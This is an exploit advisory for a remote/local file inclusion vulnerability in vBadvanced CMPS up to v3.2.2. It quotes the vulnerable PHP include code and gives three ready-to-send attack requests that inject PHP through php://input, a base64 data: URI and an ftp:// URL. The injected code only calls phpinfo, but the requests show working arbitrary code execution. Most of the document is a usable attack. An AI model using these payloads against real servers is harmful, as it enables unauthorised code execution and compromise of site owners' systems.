# Exploit Title: vBadvanced CMPS <= v3.2.2 [RFI/LFI] # Date: 25.01.2012 # Author: PacketiK email: packeto[dog]mail[dot]ru icq: 555555555 and Ulitochka =P # Software Link: http://www.vbadvanced.com/ # Version: v3.2.2 #Requirements: register_globals = on file: vba_cmps_include_bottom.php vuln_code: // Process PHP file pages here to avoid having to globalize variables if ($pages['type'] == 'php_file' AND $vba_cusmodid) { ob_start(); require($pages['template']); $home[$vba_cusmodid]['content'] = ob_get_contents(); ob_end_clean(); } Mini_exploits: need: allow_url_include = On POST http://localhost/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=php://input HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 38 <?php phpinfo();ob_end_flush();exit;?> Or http://localhost/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=data:;base64,PD9waHAgcGhwaW5mbygpO29iX2VuZF9mbHVzaCgpO2V4aXQ7Pz4= Or http://localhost/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=ftp://user:pass@127.0.0.1/123.txt